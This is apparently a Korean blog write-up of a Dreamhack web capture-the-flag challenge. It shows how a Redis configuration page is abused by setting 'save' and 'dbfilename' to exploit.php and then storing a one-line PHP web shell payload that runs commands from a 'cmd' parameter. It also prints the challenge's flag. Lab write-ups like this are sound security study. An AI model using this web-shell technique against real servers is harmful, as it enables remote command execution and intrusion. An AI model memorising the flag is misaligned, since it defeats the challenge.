반응형
이번 글은 자세히 적지 않고 풀이 과정만 적을 예정이다. (귀찮음 이슈..)
/config.php로 접속하면 아래와 같은 화면이 나온다.
GET으로 조회를 할 수 있고 SET으로 설정을 할 수 있다.
GET에서 Key에 *를 입력하면 아래와 같이 조회할 수 있는 모든 것이 나온다.
dbfilename은 redis에 변경 사항이 있을시 해당 사항을 기록하는 파일.
save는 변경사항이 몇 번 있을시 몇 분마다 기록을 할지를 설정하는 key이다.
SET으로 save를 1 1 1 1 1 1로 바꿔주고 dbfilename을 exploit.php로 바꿔준다.
그다음 /로 돌아와서 `return "<?php system($_GET['cmd']); ?>"` 를 입력해준다.
그러면 웹쉘이 업로드되고 /exploit.php?cmd = ls -al / 로 이동해보면 아래와 같이 나온다.
중간에 flag라는 실행 파일이 있으니 /exploit.php?cmd = /flag를 입력하면 flag가 나올 것이다.
flag가 정상적으로 잘 출력이 된 것을 확인할 수 있다.
flag: DH{97c08d732ca9ad65e35c8781ea3178f2d27bd726}
반응형
'Dreamhack > Web' 카테고리의 다른 글
| [Dreamhack] BISC board (0) | 2025.11.25 |
|---|---|
| [Dreamhack] PATCH-1 (0) | 2025.08.20 |
| [Dreamhack] chocoshop (0) | 2025.08.13 |
| [Dreamhack] Safe Input (0) | 2025.04.17 |
